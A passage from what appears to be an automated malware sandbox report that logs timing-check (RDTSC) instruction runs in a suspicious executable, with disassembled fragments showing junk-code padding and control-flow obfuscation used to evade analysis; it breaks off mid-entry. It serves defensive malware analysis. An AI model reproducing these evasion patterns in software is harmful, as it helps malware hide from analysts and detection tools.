    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A194C0 second address: A194C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A194C5 second address: A194E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418E0AE83h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A194E0 second address: A194EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007FB418AEFE46h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A194EF second address: A194F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19696 second address: A196A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB418AEFE4Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A196A9 second address: A196AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A197D2 second address: A197D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A197D6 second address: A197E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A197E3 second address: A197F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE51h 0x00000009 pop esi 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A197F9 second address: A197FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19966 second address: A1996A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1996A second address: A19970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19B21 second address: A19B46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FB418AEFE50h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19C8E second address: A19C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19C94 second address: A19C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19C98 second address: A19CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FB418E0AE88h 0x00000013 pushad 0x00000014 jmp 00007FB418E0AE7Dh 0x00000019 jmp 00007FB418E0AE7Bh 0x0000001e jmp 00007FB418E0AE7Bh 0x00000023 jmp 00007FB418E0AE85h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b push ecx 0x0000002c pop ecx 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19CFC second address: A19D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19E5C second address: A19EBF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418E0AE82h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FB418E0AE87h 0x00000010 jmp 00007FB418E0AE84h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jmp 00007FB418E0AE86h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19EBF second address: A19EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A19EC5 second address: A19EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A10466 second address: A10475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jnp 00007FB418AEFE4Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A10475 second address: A10479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A10479 second address: A1049F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE57h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FB418AEFE62h 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1A06B second address: A1A071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1A6C5 second address: A1A6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jno 00007FB418AEFE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1AE00 second address: A1AE1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB418E0AE87h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A200BF second address: A200C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A200C3 second address: A200C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2028B second address: A202A1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB418AEFE4Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A202A1 second address: A202A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A202A8 second address: A202DE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB418AEFE48h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jo 00007FB418AEFE5Ch 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007FB418AEFE52h 0x0000001c popad 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 popad 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A202DE second address: A202E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A202E4 second address: A202E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A202E8 second address: A2030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB418E0AE89h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A1F1E1 second address: A1F1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A262C4 second address: A262D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FB418E0AE76h 0x00000009 js 00007FB418E0AE76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A26625 second address: A2664B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB418AEFE59h 0x0000000c jng 00007FB418AEFE46h 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2664B second address: A26655 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB418E0AE76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A26978 second address: A26983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FB418AEFE46h 0x0000000a pop ecx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A26983 second address: A269A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB418E0AE84h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A269A4 second address: A269E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007FB418AEFE57h 0x0000000d jmp 00007FB418AEFE53h 0x00000012 jmp 00007FB418AEFE4Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A269E7 second address: A269ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A269ED second address: A269F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28AF2 second address: A28AFC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418E0AE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28AFC second address: A28B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FB418AEFE46h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28D77 second address: A28D91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28D91 second address: A28D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28D97 second address: A28D9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28D9B second address: A28D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28E59 second address: A28E5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A28FF0 second address: A28FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A295EA second address: A295EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A295EE second address: A29628 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB418AEFE59h 0x0000000b popad 0x0000000c mov dword ptr [esp], ebx 0x0000000f mov dword ptr [ebp+122D2025h], edx 0x00000015 nop 0x00000016 pushad 0x00000017 jmp 00007FB418AEFE4Bh 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A29628 second address: A29639 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FB418E0AE76h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A29639 second address: A2964F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A296E7 second address: A296EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A29C33 second address: A29C4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB418AEFE53h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2D0B2 second address: A2D0CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 js 00007FB418E0AE76h 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FB418E0AE7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E686 second address: A2E68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E68D second address: A2E69C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E69C second address: A2E6A6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E6A6 second address: A2E72A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FB418E0AE78h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 stc 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FB418E0AE78h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 stc 0x00000042 mov edi, dword ptr [ebp+122D2A86h] 0x00000048 push 00000000h 0x0000004a mov di, A8E7h 0x0000004e mov edi, dword ptr [ebp+12471161h] 0x00000054 xchg eax, ebx 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 jl 00007FB418E0AE76h 0x0000005e rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E72A second address: A2E755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418AEFE55h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FB418AEFE48h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A2E755 second address: A2E75B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3070F second address: A3072E instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB418AEFE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 jns 00007FB418AEFE46h 0x00000016 popad 0x00000017 jnp 00007FB418AEFE4Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3072E second address: A307A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 movzx edi, cx 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FB418E0AE78h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 movzx edi, di 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FB418E0AE78h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000018h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 pushad 0x00000045 jmp 00007FB418E0AE7Dh 0x0000004a mov dword ptr [ebp+124431FAh], eax 0x00000050 popad 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FB418E0AE7Fh 0x00000059 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A307A2 second address: A307A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A321C2 second address: A321C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A321C8 second address: A321CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A321CD second address: A32223 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB418E0AE82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c sub edi, dword ptr [ebp+122D2A8Eh] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FB418E0AE78h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e movzx edi, dx 0x00000031 push 00000000h 0x00000033 sub ebx, dword ptr [ebp+122D2BFAh] 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32223 second address: A32227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32227 second address: A3222B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3222B second address: A32256 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 je 00007FB418AEFE46h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FB418AEFE59h 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32256 second address: A32260 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB418E0AE7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A32FE9 second address: A33053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edi, esi 0x0000000b push 00000000h 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FB418AEFE48h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007FB418AEFE54h 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D28F0h], esi 0x00000034 xchg eax, esi 0x00000035 jmp 00007FB418AEFE57h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jne 00007FB418AEFE48h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A33053 second address: A33059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A3511A second address: A3511E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361D3 second address: A361DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361DD second address: A361E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361E1 second address: A361F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB418E0AE7Ah 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361F7 second address: A361FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A361FB second address: A36201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\FYQ6Ee6gbS.exeRDTSC instruction interceptor: First address: A37170 second address: A371DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jnl 00007FB418AEFE54h 0x0000000d nop 0x0000000e mov edi, dword ptr [ebp+122D19E3h] 0x00000014 jg 00007FB418AEFE4Ch 0x0000001a push 00000000h 0x0000001c movsx edi, di 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push edx 0x00000024 call 00007FB418AEFE48h 0x00000029 pop edx 0x0000002a mov dword ptr [esp+04h], edx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc edx 0x00000037 push edx 0x00000038 ret 0x00000039 pop edx 0x0000003a ret 0x0000003b xchg eax, esi 0x0000003c jg 00007FB418AEFE50h 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push 